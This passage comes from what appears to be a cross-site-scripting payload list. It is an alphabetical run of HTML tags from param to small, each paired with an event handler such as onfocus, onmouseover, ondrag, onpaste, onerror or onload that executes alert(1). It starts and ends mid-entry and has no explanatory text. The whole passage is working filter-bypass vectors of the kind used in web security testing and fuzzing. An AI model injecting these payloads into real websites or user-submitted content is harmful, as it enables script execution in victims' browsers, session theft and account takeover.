draggable="true" ondragend="alert(1)">test</param> <param draggable="true" ondragenter="alert(1)">test</param> <param draggable="true" ondragleave="alert(1)">test</param> <param draggable="true" ondragstart="alert(1)">test</param> <param id=x tabindex=1 onactivate=alert(1)></param> <param id=x tabindex=1 onbeforeactivate=alert(1)></param> <param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus> <param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus> <param id=x tabindex=1 onfocus=alert(1)></param> <param id=x tabindex=1 onfocusin=alert(1)></param> <param onbeforecopy="alert(1)" contenteditable>test</param> <param onbeforecut="alert(1)" contenteditable>test</param> <param onbeforepaste="alert(1)" contenteditable>test</param> <param onblur=alert(1) tabindex=1 id=x></param><input autofocus> <param onclick="alert(1)">test</param> <param oncontextmenu="alert(1)">test</param> <param oncopy="alert(1)" contenteditable>test</param> <param oncut="alert(1)" contenteditable>test</param> <param ondblclick="alert(1)">test</param> <param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus> <param onkeydown="alert(1)" contenteditable>test</param> <param onkeypress="alert(1)" contenteditable>test</param> <param onkeyup="alert(1)" contenteditable>test</param> <param onmousedown="alert(1)">test</param> <param onmouseenter="alert(1)">test</param> <param onmouseleave="alert(1)">test</param> <param onmousemove="alert(1)">test</param> <param onmouseout="alert(1)">test</param> <param onmouseover="alert(1)">test</param> <param onmouseup="alert(1)">test</param> <param onpaste="alert(1)" contenteditable>test</param> <picture draggable="true" ondrag="alert(1)">test</picture> <picture draggable="true" ondragend="alert(1)">test</picture> <picture draggable="true" ondragenter="alert(1)">test</picture> <picture draggable="true" ondragleave="alert(1)">test</picture> <picture draggable="true" ondragstart="alert(1)">test</picture> <picture id=x tabindex=1 onactivate=alert(1)></picture> <picture id=x tabindex=1 onbeforeactivate=alert(1)></picture> <picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus> <picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus> <picture id=x tabindex=1 onfocus=alert(1)></picture> <picture id=x tabindex=1 onfocusin=alert(1)></picture> <picture onbeforecopy="alert(1)" contenteditable>test</picture> <picture onbeforecut="alert(1)" contenteditable>test</picture> <picture onbeforepaste="alert(1)" contenteditable>test</picture> <picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus> <picture onclick="alert(1)">test</picture> <picture oncontextmenu="alert(1)">test</picture> <picture oncopy="alert(1)" contenteditable>test</picture> <picture oncut="alert(1)" contenteditable>test</picture> <picture ondblclick="alert(1)">test</picture> <picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus> <picture onkeydown="alert(1)" contenteditable>test</picture> <picture onkeypress="alert(1)" contenteditable>test</picture> <picture onkeyup="alert(1)" contenteditable>test</picture> <picture onmousedown="alert(1)">test</picture> <picture onmouseenter="alert(1)">test</picture> <picture onmouseleave="alert(1)">test</picture> <picture onmousemove="alert(1)">test</picture> <picture onmouseout="alert(1)">test</picture> <picture onmouseover="alert(1)">test</picture> <picture onmouseup="alert(1)">test</picture> <picture onpaste="alert(1)" contenteditable>test</picture> <picture><source srcset="validimage.png"><image onload=alert(1)></picture> <picture><source srcset="validimage.png"><image onloadend=alert(1)></picture> <picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture> <picture><source srcset="validimage.png"><img onload=alert(1)></picture> <picture><source srcset="validimage.png"><img onloadend=alert(1)></picture> <picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture> <plaintext draggable="true" ondrag="alert(1)">test</plaintext> <plaintext draggable="true" ondragend="alert(1)">test</plaintext> <plaintext draggable="true" ondragenter="alert(1)">test</plaintext> <plaintext draggable="true" ondragleave="alert(1)">test</plaintext> <plaintext draggable="true" ondragstart="alert(1)">test</plaintext> <plaintext id=x tabindex=1 onactivate=alert(1)></plaintext> <plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext> <plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus> <plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus> <plaintext id=x tabindex=1 onfocus=alert(1)></plaintext> <plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext> <plaintext onbeforecopy="alert(1)" contenteditable>test</plaintext> <plaintext onbeforecut="alert(1)" contenteditable>test</plaintext> <plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext> <plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus> <plaintext onclick="alert(1)">test</plaintext> <plaintext oncontextmenu="alert(1)">test</plaintext> <plaintext oncopy="alert(1)" contenteditable>test</plaintext> <plaintext oncut="alert(1)" contenteditable>test</plaintext> <plaintext ondblclick="alert(1)">test</plaintext> <plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus> <plaintext onkeydown="alert(1)" contenteditable>test</plaintext> <plaintext onkeypress="alert(1)" contenteditable>test</plaintext> <plaintext onkeyup="alert(1)" contenteditable>test</plaintext> <plaintext onmousedown="alert(1)">test</plaintext> <plaintext onmouseenter="alert(1)">test</plaintext> <plaintext onmouseleave="alert(1)">test</plaintext> <plaintext onmousemove="alert(1)">test</plaintext> <plaintext onmouseout="alert(1)">test</plaintext> <plaintext onmouseover="alert(1)">test</plaintext> <plaintext onmouseup="alert(1)">test</plaintext> <plaintext onpaste="alert(1)" contenteditable>test</plaintext> <pre draggable="true" ondrag="alert(1)">test</pre> <pre draggable="true" ondragend="alert(1)">test</pre> <pre draggable="true" ondragenter="alert(1)">test</pre> <pre draggable="true" ondragleave="alert(1)">test</pre> <pre draggable="true" ondragstart="alert(1)">test</pre> <pre id=x tabindex=1 onactivate=alert(1)></pre> <pre id=x tabindex=1 onbeforeactivate=alert(1)></pre> <pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus> <pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus> <pre id=x tabindex=1 onfocus=alert(1)></pre> <pre id=x tabindex=1 onfocusin=alert(1)></pre> <pre onbeforecopy="alert(1)" contenteditable>test</pre> <pre onbeforecut="alert(1)" contenteditable>test</pre> <pre onbeforepaste="alert(1)" contenteditable>test</pre> <pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus> <pre onclick="alert(1)">test</pre> <pre oncontextmenu="alert(1)">test</pre> <pre oncopy="alert(1)" contenteditable>test</pre> <pre oncut="alert(1)" contenteditable>test</pre> <pre ondblclick="alert(1)">test</pre> <pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus> <pre onkeydown="alert(1)" contenteditable>test</pre> <pre onkeypress="alert(1)" contenteditable>test</pre> <pre onkeyup="alert(1)" contenteditable>test</pre> <pre onmousedown="alert(1)">test</pre> <pre onmouseenter="alert(1)">test</pre> <pre onmouseleave="alert(1)">test</pre> <pre onmousemove="alert(1)">test</pre> <pre onmouseout="alert(1)">test</pre> <pre onmouseover="alert(1)">test</pre> <pre onmouseup="alert(1)">test</pre> <pre onpaste="alert(1)" contenteditable>test</pre> <progress draggable="true" ondrag="alert(1)">test</progress> <progress draggable="true" ondragend="alert(1)">test</progress> <progress draggable="true" ondragenter="alert(1)">test</progress> <progress draggable="true" ondragleave="alert(1)">test</progress> <progress draggable="true" ondragstart="alert(1)">test</progress> <progress id=x tabindex=1 onactivate=alert(1)></progress> <progress id=x tabindex=1 onbeforeactivate=alert(1)></progress> <progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus> <progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus> <progress id=x tabindex=1 onfocus=alert(1)></progress> <progress id=x tabindex=1 onfocusin=alert(1)></progress> <progress onbeforecopy="alert(1)" contenteditable>test</progress> <progress onbeforecut="alert(1)" contenteditable>test</progress> <progress onbeforepaste="alert(1)" contenteditable>test</progress> <progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus> <progress onclick="alert(1)">test</progress> <progress oncontextmenu="alert(1)">test</progress> <progress oncopy="alert(1)" contenteditable>test</progress> <progress oncut="alert(1)" contenteditable>test</progress> <progress ondblclick="alert(1)">test</progress> <progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus> <progress onkeydown="alert(1)" contenteditable>test</progress> <progress onkeypress="alert(1)" contenteditable>test</progress> <progress onkeyup="alert(1)" contenteditable>test</progress> <progress onmousedown="alert(1)">test</progress> <progress onmouseenter="alert(1)">test</progress> <progress onmouseleave="alert(1)">test</progress> <progress onmousemove="alert(1)">test</progress> <progress onmouseout="alert(1)">test</progress> <progress onmouseover="alert(1)">test</progress> <progress onmouseup="alert(1)">test</progress> <progress onpaste="alert(1)" contenteditable>test</progress> <q draggable="true" ondrag="alert(1)">test</q> <q draggable="true" ondragend="alert(1)">test</q> <q draggable="true" ondragenter="alert(1)">test</q> <q draggable="true" ondragleave="alert(1)">test</q> <q draggable="true" ondragstart="alert(1)">test</q> <q id=x tabindex=1 onactivate=alert(1)></q> <q id=x tabindex=1 onbeforeactivate=alert(1)></q> <q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus> <q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus> <q id=x tabindex=1 onfocus=alert(1)></q> <q id=x tabindex=1 onfocusin=alert(1)></q> <q onbeforecopy="alert(1)" contenteditable>test</q> <q onbeforecut="alert(1)" contenteditable>test</q> <q onbeforepaste="alert(1)" contenteditable>test</q> <q onblur=alert(1) tabindex=1 id=x></q><input autofocus> <q onclick="alert(1)">test</q> <q oncontextmenu="alert(1)">test</q> <q oncopy="alert(1)" contenteditable>test</q> <q oncut="alert(1)" contenteditable>test</q> <q ondblclick="alert(1)">test</q> <q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus> <q onkeydown="alert(1)" contenteditable>test</q> <q onkeypress="alert(1)" contenteditable>test</q> <q onkeyup="alert(1)" contenteditable>test</q> <q onmousedown="alert(1)">test</q> <q onmouseenter="alert(1)">test</q> <q onmouseleave="alert(1)">test</q> <q onmousemove="alert(1)">test</q> <q onmouseout="alert(1)">test</q> <q onmouseover="alert(1)">test</q> <q onmouseup="alert(1)">test</q> <q onpaste="alert(1)" contenteditable>test</q> <rb draggable="true" ondrag="alert(1)">test</rb> <rb draggable="true" ondragend="alert(1)">test</rb> <rb draggable="true" ondragenter="alert(1)">test</rb> <rb draggable="true" ondragleave="alert(1)">test</rb> <rb draggable="true" ondragstart="alert(1)">test</rb> <rb id=x tabindex=1 onactivate=alert(1)></rb> <rb id=x tabindex=1 onbeforeactivate=alert(1)></rb> <rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus> <rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus> <rb id=x tabindex=1 onfocus=alert(1)></rb> <rb id=x tabindex=1 onfocusin=alert(1)></rb> <rb onbeforecopy="alert(1)" contenteditable>test</rb> <rb onbeforecut="alert(1)" contenteditable>test</rb> <rb onbeforepaste="alert(1)" contenteditable>test</rb> <rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> <rb onclick="alert(1)">test</rb> <rb oncontextmenu="alert(1)">test</rb> <rb oncopy="alert(1)" contenteditable>test</rb> <rb oncut="alert(1)" contenteditable>test</rb> <rb ondblclick="alert(1)">test</rb> <rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus> <rb onkeydown="alert(1)" contenteditable>test</rb> <rb onkeypress="alert(1)" contenteditable>test</rb> <rb onkeyup="alert(1)" contenteditable>test</rb> <rb onmousedown="alert(1)">test</rb> <rb onmouseenter="alert(1)">test</rb> <rb onmouseleave="alert(1)">test</rb> <rb onmousemove="alert(1)">test</rb> <rb onmouseout="alert(1)">test</rb> <rb onmouseover="alert(1)">test</rb> <rb onmouseup="alert(1)">test</rb> <rb onpaste="alert(1)" contenteditable>test</rb> <rp draggable="true" ondrag="alert(1)">test</rp> <rp draggable="true" ondragend="alert(1)">test</rp> <rp draggable="true" ondragenter="alert(1)">test</rp> <rp draggable="true" ondragleave="alert(1)">test</rp> <rp draggable="true" ondragstart="alert(1)">test</rp> <rp id=x tabindex=1 onactivate=alert(1)></rp> <rp id=x tabindex=1 onbeforeactivate=alert(1)></rp> <rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus> <rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus> <rp id=x tabindex=1 onfocus=alert(1)></rp> <rp id=x tabindex=1 onfocusin=alert(1)></rp> <rp onbeforecopy="alert(1)" contenteditable>test</rp> <rp onbeforecut="alert(1)" contenteditable>test</rp> <rp onbeforepaste="alert(1)" contenteditable>test</rp> <rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus> <rp onclick="alert(1)">test</rp> <rp oncontextmenu="alert(1)">test</rp> <rp oncopy="alert(1)" contenteditable>test</rp> <rp oncut="alert(1)" contenteditable>test</rp> <rp ondblclick="alert(1)">test</rp> <rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus> <rp onkeydown="alert(1)" contenteditable>test</rp> <rp onkeypress="alert(1)" contenteditable>test</rp> <rp onkeyup="alert(1)" contenteditable>test</rp> <rp onmousedown="alert(1)">test</rp> <rp onmouseenter="alert(1)">test</rp> <rp onmouseleave="alert(1)">test</rp> <rp onmousemove="alert(1)">test</rp> <rp onmouseout="alert(1)">test</rp> <rp onmouseover="alert(1)">test</rp> <rp onmouseup="alert(1)">test</rp> <rp onpaste="alert(1)" contenteditable>test</rp> <rt draggable="true" ondrag="alert(1)">test</rt> <rt draggable="true" ondragend="alert(1)">test</rt> <rt draggable="true" ondragenter="alert(1)">test</rt> <rt draggable="true" ondragleave="alert(1)">test</rt> <rt draggable="true" ondragstart="alert(1)">test</rt> <rt id=x tabindex=1 onactivate=alert(1)></rt> <rt id=x tabindex=1 onbeforeactivate=alert(1)></rt> <rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus> <rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus> <rt id=x tabindex=1 onfocus=alert(1)></rt> <rt id=x tabindex=1 onfocusin=alert(1)></rt> <rt onbeforecopy="alert(1)" contenteditable>test</rt> <rt onbeforecut="alert(1)" contenteditable>test</rt> <rt onbeforepaste="alert(1)" contenteditable>test</rt> <rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus> <rt onclick="alert(1)">test</rt> <rt oncontextmenu="alert(1)">test</rt> <rt oncopy="alert(1)" contenteditable>test</rt> <rt oncut="alert(1)" contenteditable>test</rt> <rt ondblclick="alert(1)">test</rt> <rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus> <rt onkeydown="alert(1)" contenteditable>test</rt> <rt onkeypress="alert(1)" contenteditable>test</rt> <rt onkeyup="alert(1)" contenteditable>test</rt> <rt onmousedown="alert(1)">test</rt> <rt onmouseenter="alert(1)">test</rt> <rt onmouseleave="alert(1)">test</rt> <rt onmousemove="alert(1)">test</rt> <rt onmouseout="alert(1)">test</rt> <rt onmouseover="alert(1)">test</rt> <rt onmouseup="alert(1)">test</rt> <rt onpaste="alert(1)" contenteditable>test</rt> <rtc draggable="true" ondrag="alert(1)">test</rtc> <rtc draggable="true" ondragend="alert(1)">test</rtc> <rtc draggable="true" ondragenter="alert(1)">test</rtc> <rtc draggable="true" ondragleave="alert(1)">test</rtc> <rtc draggable="true" ondragstart="alert(1)">test</rtc> <rtc id=x tabindex=1 onactivate=alert(1)></rtc> <rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc> <rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input autofocus> <rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus> <rtc id=x tabindex=1 onfocus=alert(1)></rtc> <rtc id=x tabindex=1 onfocusin=alert(1)></rtc> <rtc onbeforecopy="alert(1)" contenteditable>test</rtc> <rtc onbeforecut="alert(1)" contenteditable>test</rtc> <rtc onbeforepaste="alert(1)" contenteditable>test</rtc> <rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus> <rtc onclick="alert(1)">test</rtc> <rtc oncontextmenu="alert(1)">test</rtc> <rtc oncopy="alert(1)" contenteditable>test</rtc> <rtc oncut="alert(1)" contenteditable>test</rtc> <rtc ondblclick="alert(1)">test</rtc> <rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus> <rtc onkeydown="alert(1)" contenteditable>test</rtc> <rtc onkeypress="alert(1)" contenteditable>test</rtc> <rtc onkeyup="alert(1)" contenteditable>test</rtc> <rtc onmousedown="alert(1)">test</rtc> <rtc onmouseenter="alert(1)">test</rtc> <rtc onmouseleave="alert(1)">test</rtc> <rtc onmousemove="alert(1)">test</rtc> <rtc onmouseout="alert(1)">test</rtc> <rtc onmouseover="alert(1)">test</rtc> <rtc onmouseup="alert(1)">test</rtc> <rtc onpaste="alert(1)" contenteditable>test</rtc> <ruby draggable="true" ondrag="alert(1)">test</ruby> <ruby draggable="true" ondragend="alert(1)">test</ruby> <ruby draggable="true" ondragenter="alert(1)">test</ruby> <ruby draggable="true" ondragleave="alert(1)">test</ruby> <ruby draggable="true" ondragstart="alert(1)">test</ruby> <ruby id=x tabindex=1 onactivate=alert(1)></ruby> <ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby> <ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus> <ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus> <ruby id=x tabindex=1 onfocus=alert(1)></ruby> <ruby id=x tabindex=1 onfocusin=alert(1)></ruby> <ruby onbeforecopy="alert(1)" contenteditable>test</ruby> <ruby onbeforecut="alert(1)" contenteditable>test</ruby> <ruby onbeforepaste="alert(1)" contenteditable>test</ruby> <ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus> <ruby onclick="alert(1)">test</ruby> <ruby oncontextmenu="alert(1)">test</ruby> <ruby oncopy="alert(1)" contenteditable>test</ruby> <ruby oncut="alert(1)" contenteditable>test</ruby> <ruby ondblclick="alert(1)">test</ruby> <ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus> <ruby onkeydown="alert(1)" contenteditable>test</ruby> <ruby onkeypress="alert(1)" contenteditable>test</ruby> <ruby onkeyup="alert(1)" contenteditable>test</ruby> <ruby onmousedown="alert(1)">test</ruby> <ruby onmouseenter="alert(1)">test</ruby> <ruby onmouseleave="alert(1)">test</ruby> <ruby onmousemove="alert(1)">test</ruby> <ruby onmouseout="alert(1)">test</ruby> <ruby onmouseover="alert(1)">test</ruby> <ruby onmouseup="alert(1)">test</ruby> <ruby onpaste="alert(1)" contenteditable>test</ruby> <s draggable="true" ondrag="alert(1)">test</s> <s draggable="true" ondragend="alert(1)">test</s> <s draggable="true" ondragenter="alert(1)">test</s> <s draggable="true" ondragleave="alert(1)">test</s> <s draggable="true" ondragstart="alert(1)">test</s> <s id=x tabindex=1 onactivate=alert(1)></s> <s id=x tabindex=1 onbeforeactivate=alert(1)></s> <s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus> <s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus> <s id=x tabindex=1 onfocus=alert(1)></s> <s id=x tabindex=1 onfocusin=alert(1)></s> <s onbeforecopy="alert(1)" contenteditable>test</s> <s onbeforecut="alert(1)" contenteditable>test</s> <s onbeforepaste="alert(1)" contenteditable>test</s> <s onblur=alert(1) tabindex=1 id=x></s><input autofocus> <s onclick="alert(1)">test</s> <s oncontextmenu="alert(1)">test</s> <s oncopy="alert(1)" contenteditable>test</s> <s oncut="alert(1)" contenteditable>test</s> <s ondblclick="alert(1)">test</s> <s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus> <s onkeydown="alert(1)" contenteditable>test</s> <s onkeypress="alert(1)" contenteditable>test</s> <s onkeyup="alert(1)" contenteditable>test</s> <s onmousedown="alert(1)">test</s> <s onmouseenter="alert(1)">test</s> <s onmouseleave="alert(1)">test</s> <s onmousemove="alert(1)">test</s> <s onmouseout="alert(1)">test</s> <s onmouseover="alert(1)">test</s> <s onmouseup="alert(1)">test</s> <s onpaste="alert(1)" contenteditable>test</s> <samp draggable="true" ondrag="alert(1)">test</samp> <samp draggable="true" ondragend="alert(1)">test</samp> <samp draggable="true" ondragenter="alert(1)">test</samp> <samp draggable="true" ondragleave="alert(1)">test</samp> <samp draggable="true" ondragstart="alert(1)">test</samp> <samp id=x tabindex=1 onactivate=alert(1)></samp> <samp id=x tabindex=1 onbeforeactivate=alert(1)></samp> <samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> <samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus> <samp id=x tabindex=1 onfocus=alert(1)></samp> <samp id=x tabindex=1 onfocusin=alert(1)></samp> <samp onbeforecopy="alert(1)" contenteditable>test</samp> <samp onbeforecut="alert(1)" contenteditable>test</samp> <samp onbeforepaste="alert(1)" contenteditable>test</samp> <samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus> <samp onclick="alert(1)">test</samp> <samp oncontextmenu="alert(1)">test</samp> <samp oncopy="alert(1)" contenteditable>test</samp> <samp oncut="alert(1)" contenteditable>test</samp> <samp ondblclick="alert(1)">test</samp> <samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus> <samp onkeydown="alert(1)" contenteditable>test</samp> <samp onkeypress="alert(1)" contenteditable>test</samp> <samp onkeyup="alert(1)" contenteditable>test</samp> <samp onmousedown="alert(1)">test</samp> <samp onmouseenter="alert(1)">test</samp> <samp onmouseleave="alert(1)">test</samp> <samp onmousemove="alert(1)">test</samp> <samp onmouseout="alert(1)">test</samp> <samp onmouseover="alert(1)">test</samp> <samp onmouseup="alert(1)">test</samp> <samp onpaste="alert(1)" contenteditable>test</samp> <script draggable="true" ondrag="alert(1)">test</script> <script draggable="true" ondragend="alert(1)">test</script> <script draggable="true" ondragenter="alert(1)">test</script> <script draggable="true" ondragleave="alert(1)">test</script> <script draggable="true" ondragstart="alert(1)">test</script> <script id=x tabindex=1 onactivate=alert(1)></script> <script id=x tabindex=1 onbeforeactivate=alert(1)></script> <script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus> <script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus> <script id=x tabindex=1 onfocus=alert(1)></script> <script id=x tabindex=1 onfocusin=alert(1)></script> <script onbeforecopy="alert(1)" contenteditable>test</script> <script onbeforecut="alert(1)" contenteditable>test</script> <script onbeforepaste="alert(1)" contenteditable>test</script> <script onblur=alert(1) tabindex=1 id=x></script><input autofocus> <script onclick="alert(1)">test</script> <script oncontextmenu="alert(1)">test</script> <script oncopy="alert(1)" contenteditable>test</script> <script oncut="alert(1)" contenteditable>test</script> <script ondblclick="alert(1)">test</script> <script onerror=alert(1) src=/></script> <script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus> <script onkeydown="alert(1)" contenteditable>test</script> <script onkeypress="alert(1)" contenteditable>test</script> <script onkeyup="alert(1)" contenteditable>test</script> <script onload=alert(1) src=validjs.js></script> <script onmousedown="alert(1)">test</script> <script onmouseenter="alert(1)">test</script> <script onmouseleave="alert(1)">test</script> <script onmousemove="alert(1)">test</script> <script onmouseout="alert(1)">test</script> <script onmouseover="alert(1)">test</script> <script onmouseup="alert(1)">test</script> <script onpaste="alert(1)" contenteditable>test</script> <script onreadystatechange=alert(1)></script> <section draggable="true" ondrag="alert(1)">test</section> <section draggable="true" ondragend="alert(1)">test</section> <section draggable="true" ondragenter="alert(1)">test</section> <section draggable="true" ondragleave="alert(1)">test</section> <section draggable="true" ondragstart="alert(1)">test</section> <section id=x tabindex=1 onactivate=alert(1)></section> <section id=x tabindex=1 onbeforeactivate=alert(1)></section> <section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus> <section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus> <section id=x tabindex=1 onfocus=alert(1)></section> <section id=x tabindex=1 onfocusin=alert(1)></section> <section onbeforecopy="alert(1)" contenteditable>test</section> <section onbeforecut="alert(1)" contenteditable>test</section> <section onbeforepaste="alert(1)" contenteditable>test</section> <section onblur=alert(1) tabindex=1 id=x></section><input autofocus> <section onclick="alert(1)">test</section> <section oncontextmenu="alert(1)">test</section> <section oncopy="alert(1)" contenteditable>test</section> <section oncut="alert(1)" contenteditable>test</section> <section ondblclick="alert(1)">test</section> <section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus> <section onkeydown="alert(1)" contenteditable>test</section> <section onkeypress="alert(1)" contenteditable>test</section> <section onkeyup="alert(1)" contenteditable>test</section> <section onmousedown="alert(1)">test</section> <section onmouseenter="alert(1)">test</section> <section onmouseleave="alert(1)">test</section> <section onmousemove="alert(1)">test</section> <section onmouseout="alert(1)">test</section> <section onmouseover="alert(1)">test</section> <section onmouseup="alert(1)">test</section> <section onpaste="alert(1)" contenteditable>test</section> <select autofocus onfocus=alert(1)> <select autofocus onfocusin=alert(1)> <select draggable="true" ondrag="alert(1)">test</select> <select draggable="true" ondragend="alert(1)">test</select> <select draggable="true" ondragenter="alert(1)">test</select> <select draggable="true" ondragleave="alert(1)">test</select> <select draggable="true" ondragstart="alert(1)">test</select> <select id=x tabindex=1 onactivate=alert(1)></select> <select id=x tabindex=1 onbeforeactivate=alert(1)></select> <select id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus> <select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus> <select onbeforecopy="alert(1)" contenteditable>test</select> <select onbeforecut="alert(1)" contenteditable>test</select> <select onbeforepaste="alert(1)" contenteditable>test</select> <select onblur=alert(1) id=x></select><input autofocus> <select onchange=alert(1)><option>change me</option><option>XSS</option></select> <select onclick="alert(1)">test</select> <select oncontextmenu="alert(1)">test</select> <select oncopy="alert(1)" contenteditable>test</select> <select oncut="alert(1)" contenteditable>test</select> <select ondblclick="alert(1)">test</select> <select onfocusout=alert(1) id=x></select><input autofocus> <select onkeydown="alert(1)" contenteditable>test</select> <select onkeypress="alert(1)" contenteditable>test</select> <select onkeyup="alert(1)" contenteditable>test</select> <select onmousedown="alert(1)">test</select> <select onmouseenter="alert(1)">test</select> <select onmouseleave="alert(1)">test</select> <select onmousemove="alert(1)">test</select> <select onmouseout="alert(1)">test</select> <select onmouseover="alert(1)">test</select> <select onmouseup="alert(1)">test</select> <select onpaste="alert(1)" contenteditable>test</select> <shadow draggable="true" ondrag="alert(1)">test</shadow> <shadow draggable="true" ondragend="alert(1)">test</shadow> <shadow draggable="true" ondragenter="alert(1)">test</shadow> <shadow draggable="true" ondragleave="alert(1)">test</shadow> <shadow draggable="true" ondragstart="alert(1)">test</shadow> <shadow id=x tabindex=1 onactivate=alert(1)></shadow> <shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow> <shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus> <shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus> <shadow id=x tabindex=1 onfocus=alert(1)></shadow> <shadow id=x tabindex=1 onfocusin=alert(1)></shadow> <shadow onbeforecopy="alert(1)" contenteditable>test</shadow> <shadow onbeforecut="alert(1)" contenteditable>test</shadow> <shadow onbeforepaste="alert(1)" contenteditable>test</shadow> <shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus> <shadow onclick="alert(1)">test</shadow> <shadow oncontextmenu="alert(1)">test</shadow> <shadow oncopy="alert(1)" contenteditable>test</shadow> <shadow oncut="alert(1)" contenteditable>test</shadow> <shadow ondblclick="alert(1)">test</shadow> <shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus> <shadow onkeydown="alert(1)" contenteditable>test</shadow> <shadow onkeypress="alert(1)" contenteditable>test</shadow> <shadow onkeyup="alert(1)" contenteditable>test</shadow> <shadow onmousedown="alert(1)">test</shadow> <shadow onmouseenter="alert(1)">test</shadow> <shadow onmouseleave="alert(1)">test</shadow> <shadow onmousemove="alert(1)">test</shadow> <shadow onmouseout="alert(1)">test</shadow> <shadow onmouseover="alert(1)">test</shadow> <shadow onmouseup="alert(1)">test</shadow> <shadow onpaste="alert(1)" contenteditable>test</shadow> <slot draggable="true" ondrag="alert(1)">test</slot> <slot draggable="true" ondragend="alert(1)">test</slot> <slot draggable="true" ondragenter="alert(1)">test</slot> <slot draggable="true" ondragleave="alert(1)">test</slot> <slot draggable="true" ondragstart="alert(1)">test</slot> <slot id=x tabindex=1 onactivate=alert(1)></slot> <slot id=x tabindex=1 onbeforeactivate=alert(1)></slot> <slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus> <slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus> <slot id=x tabindex=1 onfocus=alert(1)></slot> <slot id=x tabindex=1 onfocusin=alert(1)></slot> <slot onbeforecopy="alert(1)" contenteditable>test</slot> <slot onbeforecut="alert(1)" contenteditable>test</slot> <slot onbeforepaste="alert(1)" contenteditable>test</slot> <slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus> <slot onclick="alert(1)">test</slot> <slot oncontextmenu="alert(1)">test</slot> <slot oncopy="alert(1)" contenteditable>test</slot> <slot oncut="alert(1)" contenteditable>test</slot> <slot ondblclick="alert(1)">test</slot> <slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus> <slot onkeydown="alert(1)" contenteditable>test</slot> <slot onkeypress="alert(1)" contenteditable>test</slot> <slot onkeyup="alert(1)" contenteditable>test</slot> <slot onmousedown="alert(1)">test</slot> <slot onmouseenter="alert(1)">test</slot> <slot onmouseleave="alert(1)">test</slot> <slot onmousemove="alert(1)">test</slot> <slot onmouseout="alert(1)">test</slot> <slot onmouseover="alert(1)">test</slot> <slot onmouseup="alert(1)">test</slot> <slot onpaste="alert(1)" contenteditable>test</slot> <small draggable="true" ondrag="alert(1)">test</small> <small draggable="true" ondragend="alert(1)">test</small> <small draggable="true" ondragenter="alert(1)">test</small> <small draggable="true" 